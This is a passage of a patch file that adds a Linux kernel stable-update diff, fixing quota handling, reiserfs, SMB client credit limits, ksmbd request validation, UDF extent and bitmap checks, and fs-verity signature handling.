+-		spin_unlock(&dq_list_lock);
+-		dquot->dq_sb->dq_op->release_dquot(dquot);
+-		goto we_slept;
+-	}
+-	atomic_dec(&dquot->dq_count);
+ #ifdef CONFIG_QUOTA_DEBUG
+ 	/* sanity check */
+ 	BUG_ON(!list_empty(&dquot->dq_free));
+ #endif
+-	put_dquot_last(dquot);
++	put_releasing_dquots(dquot);
+ 	spin_unlock(&dq_list_lock);
++	queue_delayed_work(system_unbound_wq, &quota_release_work, 1);
+ }
+ EXPORT_SYMBOL(dqput);
+ 
+@@ -908,7 +966,7 @@ we_slept:
+ 	 * already finished or it will be canceled due to dq_count > 1 test */
+ 	wait_on_dquot(dquot);
+ 	/* Read the dquot / allocate space in quota file */
+-	if (!test_bit(DQ_ACTIVE_B, &dquot->dq_flags)) {
++	if (!dquot_active(dquot)) {
+ 		int err;
+ 
+ 		err = sb->dq_op->acquire_dquot(dquot);
+@@ -1425,7 +1483,7 @@ static int info_bdq_free(struct dquot *dquot, qsize_t space)
+ 	return QUOTA_NL_NOWARN;
+ }
+ 
+-static int dquot_active(const struct inode *inode)
++static int inode_quota_active(const struct inode *inode)
+ {
+ 	struct super_block *sb = inode->i_sb;
+ 
+@@ -1448,7 +1506,7 @@ static int __dquot_initialize(struct inode *inode, int type)
+ 	qsize_t rsv;
+ 	int ret = 0;
+ 
+-	if (!dquot_active(inode))
++	if (!inode_quota_active(inode))
+ 		return 0;
+ 
+ 	dquots = i_dquot(inode);
+@@ -1556,7 +1614,7 @@ bool dquot_initialize_needed(struct inode *inode)
+ 	struct dquot **dquots;
+ 	int i;
+ 
+-	if (!dquot_active(inode))
++	if (!inode_quota_active(inode))
+ 		return false;
+ 
+ 	dquots = i_dquot(inode);
+@@ -1667,7 +1725,7 @@ int __dquot_alloc_space(struct inode *inode, qsize_t number, int flags)
+ 	int reserve = flags & DQUOT_SPACE_RESERVE;
+ 	struct dquot **dquots;
+ 
+-	if (!dquot_active(inode)) {
++	if (!inode_quota_active(inode)) {
+ 		if (reserve) {
+ 			spin_lock(&inode->i_lock);
+ 			*inode_reserved_space(inode) += number;
+@@ -1737,7 +1795,7 @@ int dquot_alloc_inode(struct inode *inode)
+ 	struct dquot_warn warn[MAXQUOTAS];
+ 	struct dquot * const *dquots;
+ 
+-	if (!dquot_active(inode))
++	if (!inode_quota_active(inode))
+ 		return 0;
+ 	for (cnt = 0; cnt < MAXQUOTAS; cnt++)
+ 		warn[cnt].w_type = QUOTA_NL_NOWARN;
+@@ -1780,7 +1838,7 @@ int dquot_claim_space_nodirty(struct inode *inode, qsize_t number)
+ 	struct dquot **dquots;
+ 	int cnt, index;
+ 
+-	if (!dquot_active(inode)) {
++	if (!inode_quota_active(inode)) {
+ 		spin_lock(&inode->i_lock);
+ 		*inode_reserved_space(inode) -= number;
+ 		__inode_add_bytes(inode, number);
+@@ -1822,7 +1880,7 @@ void dquot_reclaim_space_nodirty(struct inode *inode, qsize_t number)
+ 	struct dquot **dquots;
+ 	int cnt, index;
+ 
+-	if (!dquot_active(inode)) {
++	if (!inode_quota_active(inode)) {
+ 		spin_lock(&inode->i_lock);
+ 		*inode_reserved_space(inode) += number;
+ 		__inode_sub_bytes(inode, number);
+@@ -1866,7 +1924,7 @@ void __dquot_free_space(struct inode *inode, qsize_t number, int flags)
+ 	struct dquot **dquots;
+ 	int reserve = flags & DQUOT_SPACE_RESERVE, index;
+ 
+-	if (!dquot_active(inode)) {
++	if (!inode_quota_active(inode)) {
+ 		if (reserve) {
+ 			spin_lock(&inode->i_lock);
+ 			*inode_reserved_space(inode) -= number;
+@@ -1921,7 +1979,7 @@ void dquot_free_inode(struct inode *inode)
+ 	struct dquot * const *dquots;
+ 	int index;
+ 
+-	if (!dquot_active(inode))
++	if (!inode_quota_active(inode))
+ 		return;
+ 
+ 	dquots = i_dquot(inode);
+@@ -2093,7 +2151,7 @@ int dquot_transfer(struct user_namespace *mnt_userns, struct inode *inode,
+ 	struct super_block *sb = inode->i_sb;
+ 	int ret;
+ 
+-	if (!dquot_active(inode))
++	if (!inode_quota_active(inode))
+ 		return 0;
+ 
+ 	if (i_uid_needs_update(mnt_userns, iattr, inode)) {
+diff --git a/fs/reiserfs/journal.c b/fs/reiserfs/journal.c
+index 9f62da7471c9e..eb81b4170cb51 100644
+--- a/fs/reiserfs/journal.c
++++ b/fs/reiserfs/journal.c
+@@ -2326,7 +2326,7 @@ static struct buffer_head *reiserfs_breada(struct block_device *dev,
+ 	int i, j;
+ 
+ 	bh = __getblk(dev, block, bufsize);
+-	if (buffer_uptodate(bh))
++	if (!bh || buffer_uptodate(bh))
+ 		return (bh);
+ 
+ 	if (block + BUFNR > max_block) {
+@@ -2336,6 +2336,8 @@ static struct buffer_head *reiserfs_breada(struct block_device *dev,
+ 	j = 1;
+ 	for (i = 1; i < blocks; i++) {
+ 		bh = __getblk(dev, block + i, bufsize);
++		if (!bh)
++			break;
+ 		if (buffer_uptodate(bh)) {
+ 			brelse(bh);
+ 			break;
+diff --git a/fs/smb/client/cifsglob.h b/fs/smb/client/cifsglob.h
+index a37afbb7e399f..4a092cc5a3936 100644
+--- a/fs/smb/client/cifsglob.h
++++ b/fs/smb/client/cifsglob.h
+@@ -970,43 +970,6 @@ release_iface(struct kref *ref)
+ 	kfree(iface);
+ }
+ 
+-/*
+- * compare two interfaces a and b
+- * return 0 if everything matches.
+- * return 1 if a has higher link speed, or rdma capable, or rss capable
+- * return -1 otherwise.
+- */
+-static inline int
+-iface_cmp(struct cifs_server_iface *a, struct cifs_server_iface *b)
+-{
+-	int cmp_ret = 0;
+-
+-	WARN_ON(!a || !b);
+-	if (a->speed == b->speed) {
+-		if (a->rdma_capable == b->rdma_capable) {
+-			if (a->rss_capable == b->rss_capable) {
+-				cmp_ret = memcmp(&a->sockaddr, &b->sockaddr,
+-						 sizeof(a->sockaddr));
+-				if (!cmp_ret)
+-					return 0;
+-				else if (cmp_ret > 0)
+-					return 1;
+-				else
+-					return -1;
+-			} else if (a->rss_capable > b->rss_capable)
+-				return 1;
+-			else
+-				return -1;
+-		} else if (a->rdma_capable > b->rdma_capable)
+-			return 1;
+-		else
+-			return -1;
+-	} else if (a->speed > b->speed)
+-		return 1;
+-	else
+-		return -1;
+-}
+-
+ struct cifs_chan {
+ 	unsigned int in_reconnect : 1; /* if session setup in progress for this channel */
+ 	struct TCP_Server_Info *server;
+diff --git a/fs/smb/client/cifsproto.h b/fs/smb/client/cifsproto.h
+index 98513f5af3f96..a914b88ca51a1 100644
+--- a/fs/smb/client/cifsproto.h
++++ b/fs/smb/client/cifsproto.h
+@@ -85,6 +85,7 @@ extern int cifs_handle_standard(struct TCP_Server_Info *server,
+ 				struct mid_q_entry *mid);
+ extern int smb3_parse_devname(const char *devname, struct smb3_fs_context *ctx);
+ extern int smb3_parse_opt(const char *options, const char *key, char **val);
++extern int cifs_ipaddr_cmp(struct sockaddr *srcaddr, struct sockaddr *rhs);
+ extern bool cifs_match_ipaddr(struct sockaddr *srcaddr, struct sockaddr *rhs);
+ extern int cifs_discard_remaining_data(struct TCP_Server_Info *server);
+ extern int cifs_call_async(struct TCP_Server_Info *server,
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+index cbe08948baf4a..9cd282960c0bb 100644
+--- a/fs/smb/client/connect.c
++++ b/fs/smb/client/connect.c
+@@ -1343,6 +1343,56 @@ next_pdu:
+ 	module_put_and_kthread_exit(0);
+ }
+ 
++int
++cifs_ipaddr_cmp(struct sockaddr *srcaddr, struct sockaddr *rhs)
++{
++	struct sockaddr_in *saddr4 = (struct sockaddr_in *)srcaddr;
++	struct sockaddr_in *vaddr4 = (struct sockaddr_in *)rhs;
++	struct sockaddr_in6 *saddr6 = (struct sockaddr_in6 *)srcaddr;
++	struct sockaddr_in6 *vaddr6 = (struct sockaddr_in6 *)rhs;
++
++	switch (srcaddr->sa_family) {
++	case AF_UNSPEC:
++		switch (rhs->sa_family) {
++		case AF_UNSPEC:
++			return 0;
++		case AF_INET:
++		case AF_INET6:
++			return 1;
++		default:
++			return -1;
++		}
++	case AF_INET: {
++		switch (rhs->sa_family) {
++		case AF_UNSPEC:
++			return -1;
++		case AF_INET:
++			return memcmp(saddr4, vaddr4,
++				      sizeof(struct sockaddr_in));
++		case AF_INET6:
++			return 1;
++		default:
++			return -1;
++		}
++	}
++	case AF_INET6: {
++		switch (rhs->sa_family) {
++		case AF_UNSPEC:
++		case AF_INET:
++			return -1;
++		case AF_INET6:
++			return memcmp(saddr6,
++				      vaddr6,
++				      sizeof(struct sockaddr_in6));
++		default:
++			return -1;
++		}
++	}
++	default:
++		return -1; /* don't expect to be here */
++	}
++}
++
+ /*
+  * Returns true if srcaddr isn't specified and rhs isn't specified, or
+  * if srcaddr is specified and matches the IP address of the rhs argument
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index e6a191a7499e8..6b020d80bb949 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -34,6 +34,8 @@ static int
+ change_conf(struct TCP_Server_Info *server)
+ {
+ 	server->credits += server->echo_credits + server->oplock_credits;
++	if (server->credits > server->max_credits)
++		server->credits = server->max_credits;
+ 	server->oplock_credits = server->echo_credits = 0;
+ 	switch (server->credits) {
+ 	case 0:
+@@ -511,6 +513,43 @@ smb3_negotiate_rsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
+ 	return rsize;
+ }
+ 
++/*
++ * compare two interfaces a and b
++ * return 0 if everything matches.
++ * return 1 if a is rdma capable, or rss capable, or has higher link speed
++ * return -1 otherwise.
++ */
++static int
++iface_cmp(struct cifs_server_iface *a, struct cifs_server_iface *b)
++{
++	int cmp_ret = 0;
++
++	WARN_ON(!a || !b);
++	if (a->rdma_capable == b->rdma_capable) {
++		if (a->rss_capable == b->rss_capable) {
++			if (a->speed == b->speed) {
++				cmp_ret = cifs_ipaddr_cmp((struct sockaddr *) &a->sockaddr,
++							  (struct sockaddr *) &b->sockaddr);
++				if (!cmp_ret)
++					return 0;
++				else if (cmp_ret > 0)
++					return 1;
++				else
++					return -1;
++			} else if (a->speed > b->speed)
++				return 1;
++			else
++				return -1;
++		} else if (a->rss_capable > b->rss_capable)
++			return 1;
++		else
++			return -1;
++	} else if (a->rdma_capable > b->rdma_capable)
++		return 1;
++	else
++		return -1;
++}
++
+ static int
+ parse_server_interfaces(struct network_interface_info_ioctl_rsp *buf,
+ 			size_t buf_len, struct cifs_ses *ses, bool in_mount)
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index ba46156e32680..ae17d78f6ba17 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
+@@ -1312,7 +1312,12 @@ SMB2_sess_alloc_buffer(struct SMB2_sess_data *sess_data)
+ 	}
+ 
+ 	/* enough to enable echos and oplocks and one max size write */
+-	req->hdr.CreditRequest = cpu_to_le16(130);
++	if (server->credits >= server->max_credits)
++		req->hdr.CreditRequest = cpu_to_le16(0);
++	else
++		req->hdr.CreditRequest = cpu_to_le16(
++			min_t(int, server->max_credits -
++			      server->credits, 130));
+ 
+ 	/* only one of SMB2 signing flags may be set in SMB2 request */
+ 	if (server->sign)
+@@ -1907,7 +1912,12 @@ SMB2_tcon(const unsigned int xid, struct cifs_ses *ses, const char *tree,
+ 	rqst.rq_nvec = 2;
+ 
+ 	/* Need 64 for max size write so ask for more in case not there yet */
+-	req->hdr.CreditRequest = cpu_to_le16(64);
++	if (server->credits >= server->max_credits)
++		req->hdr.CreditRequest = cpu_to_le16(0);
++	else
++		req->hdr.CreditRequest = cpu_to_le16(
++			min_t(int, server->max_credits -
++			      server->credits, 64));
+ 
+ 	rc = cifs_send_recv(xid, ses, server,
+ 			    &rqst, &resp_buftype, flags, &rsp_iov);
+@@ -4291,6 +4301,7 @@ smb2_async_readv(struct cifs_readdata *rdata)
+ 	struct TCP_Server_Info *server;
+ 	struct cifs_tcon *tcon = tlink_tcon(rdata->cfile->tlink);
+ 	unsigned int total_len;
++	int credit_request;
+ 
+ 	cifs_dbg(FYI, "%s: offset=%llu bytes=%u\n",
+ 		 __func__, rdata->offset, rdata->bytes);
+@@ -4322,7 +4333,13 @@ smb2_async_readv(struct cifs_readdata *rdata)
+ 	if (rdata->credits.value > 0) {
+ 		shdr->CreditCharge = cpu_to_le16(DIV_ROUND_UP(rdata->bytes,
+ 						SMB2_MAX_BUFFER_SIZE));
+-		shdr->CreditRequest = cpu_to_le16(le16_to_cpu(shdr->CreditCharge) + 8);
++		credit_request = le16_to_cpu(shdr->CreditCharge) + 8;
++		if (server->credits >= server->max_credits)
++			shdr->CreditRequest = cpu_to_le16(0);
++		else
++			shdr->CreditRequest = cpu_to_le16(
++				min_t(int, server->max_credits -
++						server->credits, credit_request));
+ 
+ 		rc = adjust_credits(server, &rdata->credits, rdata->bytes);
+ 		if (rc)
+@@ -4532,6 +4549,7 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 	unsigned int total_len;
+ 	struct cifs_io_parms _io_parms;
+ 	struct cifs_io_parms *io_parms = NULL;
++	int credit_request;
+ 
+ 	if (!wdata->server)
+ 		server = wdata->server = cifs_pick_channel(tcon->ses);
+@@ -4649,7 +4667,13 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 	if (wdata->credits.value > 0) {
+ 		shdr->CreditCharge = cpu_to_le16(DIV_ROUND_UP(wdata->bytes,
+ 						    SMB2_MAX_BUFFER_SIZE));
+-		shdr->CreditRequest = cpu_to_le16(le16_to_cpu(shdr->CreditCharge) + 8);
++		credit_request = le16_to_cpu(shdr->CreditCharge) + 8;
++		if (server->credits >= server->max_credits)
++			shdr->CreditRequest = cpu_to_le16(0);
++		else
++			shdr->CreditRequest = cpu_to_le16(
++				min_t(int, server->max_credits -
++						server->credits, credit_request));
+ 
+ 		rc = adjust_credits(server, &wdata->credits, io_parms->length);
+ 		if (rc)
+diff --git a/fs/smb/server/server.c b/fs/smb/server/server.c
+index 847ee62afb8a1..9804cabe72a84 100644
+--- a/fs/smb/server/server.c
++++ b/fs/smb/server/server.c
+@@ -286,6 +286,7 @@ static void handle_ksmbd_work(struct work_struct *wk)
+ static int queue_ksmbd_work(struct ksmbd_conn *conn)
+ {
+ 	struct ksmbd_work *work;
++	int err;
+ 
+ 	work = ksmbd_alloc_work_struct();
+ 	if (!work) {
+@@ -297,7 +298,11 @@ static int queue_ksmbd_work(struct ksmbd_conn *conn)
+ 	work->request_buf = conn->request_buf;
+ 	conn->request_buf = NULL;
+ 
+-	ksmbd_init_smb_server(work);
++	err = ksmbd_init_smb_server(work);
++	if (err) {
++		ksmbd_free_work_struct(work);
++		return 0;
++	}
+ 
+ 	ksmbd_conn_enqueue_request(work);
+ 	atomic_inc(&conn->r_count);
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 9b621fd993bb7..f6fd5cf976a50 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -86,9 +86,9 @@ struct channel *lookup_chann_list(struct ksmbd_session *sess, struct ksmbd_conn
+  */
+ int smb2_get_ksmbd_tcon(struct ksmbd_work *work)
+ {
+-	struct smb2_hdr *req_hdr = smb2_get_msg(work->request_buf);
++	struct smb2_hdr *req_hdr = ksmbd_req_buf_next(work);
+ 	unsigned int cmd = le16_to_cpu(req_hdr->Command);
+-	int tree_id;
++	unsigned int tree_id;
+ 
+ 	if (cmd == SMB2_TREE_CONNECT_HE ||
+ 	    cmd ==  SMB2_CANCEL_HE ||
+@@ -113,7 +113,7 @@ int smb2_get_ksmbd_tcon(struct ksmbd_work *work)
+ 			pr_err("The first operation in the compound does not have tcon\n");
+ 			return -EINVAL;
+ 		}
+-		if (work->tcon->id != tree_id) {
++		if (tree_id != UINT_MAX && work->tcon->id != tree_id) {
+ 			pr_err("tree id(%u) is different with id(%u) in first operation\n",
+ 					tree_id, work->tcon->id);
+ 			return -EINVAL;
+@@ -565,9 +565,9 @@ int smb2_allocate_rsp_buf(struct ksmbd_work *work)
+  */
+ int smb2_check_user_session(struct ksmbd_work *work)
+ {
+-	struct smb2_hdr *req_hdr = smb2_get_msg(work->request_buf);
++	struct smb2_hdr *req_hdr = ksmbd_req_buf_next(work);
+ 	struct ksmbd_conn *conn = work->conn;
+-	unsigned int cmd = conn->ops->get_cmd_val(work);
++	unsigned int cmd = le16_to_cpu(req_hdr->Command);
+ 	unsigned long long sess_id;
+ 
+ 	/*
+@@ -593,7 +593,7 @@ int smb2_check_user_session(struct ksmbd_work *work)
+ 			pr_err("The first operation in the compound does not have sess\n");
+ 			return -EINVAL;
+ 		}
+-		if (work->sess->id != sess_id) {
++		if (sess_id != ULLONG_MAX && work->sess->id != sess_id) {
+ 			pr_err("session id(%llu) is different with the first operation(%lld)\n",
+ 					sess_id, work->sess->id);
+ 			return -EINVAL;
+@@ -6314,6 +6314,11 @@ int smb2_read(struct ksmbd_work *work)
+ 	unsigned int max_read_size = conn->vals->max_read_size;
+ 
+ 	WORK_BUFFERS(work, req, rsp);
++	if (work->next_smb2_rcv_hdr_off) {
++		work->send_no_response = 1;
++		err = -EOPNOTSUPP;
++		goto out;
++	}
+ 
+ 	if (test_share_config_flag(work->tcon->share_conf,
+ 				   KSMBD_SHARE_FLAG_PIPE)) {
+@@ -8713,7 +8718,8 @@ int smb3_decrypt_req(struct ksmbd_work *work)
+ 	struct smb2_transform_hdr *tr_hdr = smb2_get_msg(buf);
+ 	int rc = 0;
+ 
+-	if (buf_data_size < sizeof(struct smb2_hdr)) {
++	if (pdu_length < sizeof(struct smb2_transform_hdr) ||
++	    buf_data_size < sizeof(struct smb2_hdr)) {
+ 		pr_err("Transform message is too small (%u)\n",
+ 		       pdu_length);
+ 		return -ECONNABORTED;
+diff --git a/fs/smb/server/smb_common.c b/fs/smb/server/smb_common.c
+index d937e2f45c829..a4421d9458d90 100644
+--- a/fs/smb/server/smb_common.c
++++ b/fs/smb/server/smb_common.c
+@@ -388,26 +388,29 @@ static struct smb_version_cmds smb1_server_cmds[1] = {
+ 	[SMB_COM_NEGOTIATE_EX]	= { .proc = smb1_negotiate, },
+ };
+ 
+-static void init_smb1_server(struct ksmbd_conn *conn)
++static int init_smb1_server(struct ksmbd_conn *conn)
+ {
+ 	conn->ops = &smb1_server_ops;
+ 	conn->cmds = smb1_server_cmds;
+ 	conn->max_cmds = ARRAY_SIZE(smb1_server_cmds);
++	return 0;
+ }
+ 
+-void ksmbd_init_smb_server(struct ksmbd_work *work)
++int ksmbd_init_smb_server(struct ksmbd_work *work)
+ {
+ 	struct ksmbd_conn *conn = work->conn;
+ 	__le32 proto;
+ 
+-	if (conn->need_neg == false)
+-		return;
+-
+ 	proto = *(__le32 *)((struct smb_hdr *)work->request_buf)->Protocol;
++	if (conn->need_neg == false) {
++		if (proto == SMB1_PROTO_NUMBER)
++			return -EINVAL;
++		return 0;
++	}
++
+ 	if (proto == SMB1_PROTO_NUMBER)
+-		init_smb1_server(conn);
+-	else
+-		init_smb3_11_server(conn);
++		return init_smb1_server(conn);
++	return init_smb3_11_server(conn);
+ }
+ 
+ int ksmbd_populate_dot_dotdot_entries(struct ksmbd_work *work, int info_level,
+diff --git a/fs/smb/server/smb_common.h b/fs/smb/server/smb_common.h
+index e63d2a4f466b5..1cbb492cdefec 100644
+--- a/fs/smb/server/smb_common.h
++++ b/fs/smb/server/smb_common.h
+@@ -427,7 +427,7 @@ bool ksmbd_smb_request(struct ksmbd_conn *conn);
+ 
+ int ksmbd_lookup_dialect_by_id(__le16 *cli_dialects, __le16 dialects_count);
+ 
+-void ksmbd_init_smb_server(struct ksmbd_work *work);
++int ksmbd_init_smb_server(struct ksmbd_work *work);
+ 
+ struct ksmbd_kstat;
+ int ksmbd_populate_dot_dotdot_entries(struct ksmbd_work *work,
+diff --git a/fs/udf/balloc.c b/fs/udf/balloc.c
+index 8e597db4d9710..f416b7fe092fc 100644
+--- a/fs/udf/balloc.c
++++ b/fs/udf/balloc.c
+@@ -36,18 +36,41 @@ static int read_block_bitmap(struct super_block *sb,
+ 			     unsigned long bitmap_nr)
+ {
+ 	struct buffer_head *bh = NULL;
+-	int retval = 0;
++	int i;
++	int max_bits, off, count;
+ 	struct kernel_lb_addr loc;
+ 
+ 	loc.logicalBlockNum = bitmap->s_extPosition;
+ 	loc.partitionReferenceNum = UDF_SB(sb)->s_partition;
+ 
+ 	bh = udf_tread(sb, udf_get_lb_pblock(sb, &loc, block));
++	bitmap->s_block_bitmap[bitmap_nr] = bh;
+ 	if (!bh)
+-		retval = -EIO;
++		return -EIO;
+ 
+-	bitmap->s_block_bitmap[bitmap_nr] = bh;
+-	return retval;
++	/* Check consistency of Space Bitmap buffer. */
++	max_bits = sb->s_blocksize * 8;
++	if (!bitmap_nr) {
++		off = sizeof(struct spaceBitmapDesc) << 3;
++		count = min(max_bits - off, bitmap->s_nr_groups);
++	} else {
++		/*
++		 * Rough check if bitmap number is too big to have any bitmap
++		 * blocks reserved.
++		 */
++		if (bitmap_nr >
++		    (bitmap->s_nr_groups >> (sb->s_blocksize_bits + 3)) + 2)
++			return 0;
++		off = 0;
++		count = bitmap->s_nr_groups - bitmap_nr * max_bits +
++				(sizeof(struct spaceBitmapDesc) << 3);
++		count = min(count, max_bits);
++	}
++
++	for (i = 0; i < count; i++)
++		if (udf_test_bit(i + off, bh->b_data))
++			return -EFSCORRUPTED;
++	return 0;
+ }
+ 
+ static int __load_block_bitmap(struct super_block *sb,
+diff --git a/fs/udf/inode.c b/fs/udf/inode.c
+index a4e875b61f895..b574c2a9ce7ba 100644
+--- a/fs/udf/inode.c
++++ b/fs/udf/inode.c
+@@ -57,15 +57,15 @@ static int udf_update_inode(struct inode *, int);
+ static int udf_sync_inode(struct inode *inode);
+ static int udf_alloc_i_data(struct inode *inode, size_t size);
+ static sector_t inode_getblk(struct inode *, sector_t, int *, int *);
+-static int8_t udf_insert_aext(struct inode *, struct extent_position,
+-			      struct kernel_lb_addr, uint32_t);
++static int udf_insert_aext(struct inode *, struct extent_position,
++			   struct kernel_lb_addr, uint32_t);
+ static void udf_split_extents(struct inode *, int *, int, udf_pblk_t,
+ 			      struct kernel_long_ad *, int *);
+ static void udf_prealloc_extents(struct inode *, int, int,
+ 				 struct kernel_long_ad *, int *);
+ static void udf_merge_extents(struct inode *, struct kernel_long_ad *, int *);
+-static void udf_update_extents(struct inode *, struct kernel_long_ad *, int,
+-			       int, struct extent_position *);
++static int udf_update_extents(struct inode *, struct kernel_long_ad *, int,
++			      int, struct extent_position *);
+ static int udf_get_block(struct inode *, sector_t, struct buffer_head *, int);
+ 
+ static void __udf_clear_extent_cache(struct inode *inode)
+@@ -696,7 +696,7 @@ static sector_t inode_getblk(struct inode *inode, sector_t block,
+ 	struct kernel_lb_addr eloc, tmpeloc;
+ 	int c = 1;
+ 	loff_t lbcount = 0, b_off = 0;
+-	udf_pblk_t newblocknum, newblock;
++	udf_pblk_t newblocknum, newblock = 0;
+ 	sector_t offset = 0;
+ 	int8_t etype;
+ 	struct udf_inode_info *iinfo = UDF_I(inode);
+@@ -799,7 +799,6 @@ static sector_t inode_getblk(struct inode *inode, sector_t block,
+ 		ret = udf_do_extend_file(inode, &prev_epos, laarr, hole_len);
+ 		if (ret < 0) {
+ 			*err = ret;
+-			newblock = 0;
+ 			goto out_free;
+ 		}
+ 		c = 0;
+@@ -862,7 +861,6 @@ static sector_t inode_getblk(struct inode *inode, sector_t block,
+ 				goal, err);
+ 		if (!newblocknum) {
+ 			*err = -ENOSPC;
+-			newblock = 0;
+ 			goto out_free;
+ 		}
+ 		if (isBeyondEOF)
+@@ -888,7 +886,9 @@ static sector_t inode_getblk(struct inode *inode, sector_t block,
+ 	/* write back the new extents, inserting new extents if the new number
+ 	 * of extents is greater than the old number, and deleting extents if
+ 	 * the new number of extents is less than the old number */
+-	udf_update_extents(inode, laarr, startnum, endnum, &prev_epos);
++	*err = udf_update_extents(inode, laarr, startnum, endnum, &prev_epos);
++	if (*err < 0)
++		goto out_free;
+ 
+ 	newblock = udf_get_pblock(inode->i_sb, newblocknum,
+ 				iinfo->i_location.partitionReferenceNum, 0);
+@@ -1156,21 +1156,30 @@ static void udf_merge_extents(struct inode *inode, struct kernel_long_ad *laarr,
+ 	}
+ }
+ 
+-static void udf_update_extents(struct inode *inode, struct kernel_long_ad *laarr,
+-			       int startnum, int endnum,
+-			       struct extent_position *epos)
++static int udf_update_extents(struct inode *inode, struct kernel_long_ad *laarr,
++			      int startnum, int endnum,
++			      struct extent_position *epos)
+ {
+ 	int start = 0, i;
+ 	struct kernel_lb_addr tmploc;
+ 	uint32_t tmplen;
++	int err;
+ 
+ 	if (startnum > endnum) {
+ 		for (i = 0; i < (startnum - endnum); i++)
+ 			udf_delete_aext(inode, *epos);
+ 	} else if (startnum < endnum) {
+ 		for (i = 0; i < (endnum - startnum); i++) {
+-			udf_insert_aext(inode, *epos, laarr[i].extLocation,
+-					laarr[i].extLength);
++			err = udf_insert_aext(inode, *epos,
++					      laarr[i].extLocation,
++					      laarr[i].extLength);
++			/*
++			 * If we fail here, we are likely corrupting the extent
++			 * list and leaking blocks. At least stop early to
++			 * limit the damage.
++			 */
++			if (err < 0)
++				return err;
+ 			udf_next_aext(inode, epos, &laarr[i].extLocation,
+ 				      &laarr[i].extLength, 1);
+ 			start++;
+@@ -1182,6 +1191,7 @@ static void udf_update_extents(struct inode *inode, struct kernel_long_ad *laarr
+ 		udf_write_aext(inode, epos, &laarr[i].extLocation,
+ 			       laarr[i].extLength, 1);
+ 	}
++	return 0;
+ }
+ 
+ struct buffer_head *udf_bread(struct inode *inode, udf_pblk_t block,
+@@ -2210,12 +2220,13 @@ int8_t udf_current_aext(struct inode *inode, struct extent_position *epos,
+ 	return etype;
+ }
+ 
+-static int8_t udf_insert_aext(struct inode *inode, struct extent_position epos,
+-			      struct kernel_lb_addr neloc, uint32_t nelen)
++static int udf_insert_aext(struct inode *inode, struct extent_position epos,
++			   struct kernel_lb_addr neloc, uint32_t nelen)
+ {
+ 	struct kernel_lb_addr oeloc;
+ 	uint32_t oelen;
+ 	int8_t etype;
++	int err;
+ 
+ 	if (epos.bh)
+ 		get_bh(epos.bh);
+@@ -2225,10 +2236,10 @@ static int8_t udf_insert_aext(struct inode *inode, struct extent_position epos,
+ 		neloc = oeloc;
+ 		nelen = (etype << 30) | oelen;
+ 	}
+-	udf_add_aext(inode, &epos, &neloc, nelen, 1);
++	err = udf_add_aext(inode, &epos, &neloc, nelen, 1);
+ 	brelse(epos.bh);
+ 
+-	return (nelen >> 30);
++	return err;
+ }
+ 
+ int8_t udf_delete_aext(struct inode *inode, struct extent_position epos)
+diff --git a/fs/verity/signature.c b/fs/verity/signature.c
+index 143a530a80088..b59de03055e1e 100644
+--- a/fs/verity/signature.c
++++ b/fs/verity/signature.c
+@@ -54,6 +54,22 @@ int fsverity_verify_signature(const struct fsverity_info *vi,
+ 		return 0;
+ 	}
+ 
++	if (fsverity_keyring->keys.nr_leaves_on_tree == 0) {
++		/*
++		 * The ".fs-verity" keyring is empty, due to builtin signatures
++		 * being supported by the kernel but not actually being used.
++		 * In this case, verify_pkcs7_signature() would always return an
++		 * error, usually ENOKEY.  It could also be EBADMSG if the
++		 * PKCS#7 is malformed, but that isn't very important to
++		 * distinguish.  So, just skip to ENOKEY to avoid the attack
++		 * surface of the PKCS#7 parser, which would otherwise be
++		 * reachable by any task able to execute FS_IOC_ENABLE_VERITY.
++		 */
++		fsverity_err(inode,
++			     "fs-verity keyring is empty, rejecting signed file!");
++		return -ENOKEY;
++	}
++
+ 	d = kzalloc(sizeof(*d) + hash_alg->digest_size, GFP_KERNEL);
+ 	if (!d)
+ 		return -ENOMEM;
+diff --git a/include/crypto/algapi.h b/include/crypto/algapi.h
+index 224b860647083..939a3196bf002 100644
+--- a/include/crypto/algapi.h
++++ b/include/crypto/algapi.h
+@@ -12,6 +12,7 @@
+ #include <linux/kconfig.h>
+ #include <linux/list.h>
+ #include <linux/types.h>
++#include <linux/workqueue.h>
+ 
+ #include <asm/unaligned.h>
+ 
+@@ -60,6 +61,8 @@ struct crypto_instance {
+ 		struct crypto_spawn *spawns;
+ 	};
+ 
++	struct work_struct free_work;
++
+ 	void *__ctx[] CRYPTO_MINALIGN_ATTR;
+ };
+ 
+diff --git a/include/dt-bindings/clock/qcom,gcc-sc8280xp.h b/include/dt-bindings/clock/qcom,gcc-sc8280xp.h
+index cb2fb638825ca..8454915917849 100644
+--- a/include/dt-bindings/clock/qcom,gcc-sc8280xp.h
++++ b/include/dt-bindings/clock/qcom,gcc-sc8280xp.h
+@@ -492,5 +492,17 @@
+ #define USB30_MP_GDSC					9
+ #define USB30_PRIM_GDSC					10
+ #define USB30_SEC_GDSC					11
++#define EMAC_0_GDSC					12
++#define EMAC_1_GDSC					13
++#define USB4_1_GDSC					14
++#define USB4_GDSC					15
++#define HLOS1_VOTE_MMNOC_MMU_TBU_HF0_GDSC		16
++#define HLOS1_VOTE_MMNOC_MMU_TBU_HF1_GDSC		17
++#define HLOS1_VOTE_MMNOC_MMU_TBU_SF0_GDSC		18
++#define HLOS1_VOTE_MMNOC_MMU_TBU_SF1_GDSC		19
++#define HLOS1_VOTE_TURING_MMU_TBU0_GDSC			20
++#define HLOS1_VOTE_TURING_MMU_TBU1_GDSC			21
++#define HLOS1_VOTE_TURING_MMU_TBU2_GDSC			22
++#define HLOS1_VOTE_TURING_MMU_TBU3_GDSC			23
+ 
+ #endif
+diff --git a/include/linux/arm_sdei.h b/include/linux/arm_sdei.h
+index 14dc461b0e829..255701e1251b4 100644
+--- a/include/linux/arm_sdei.h
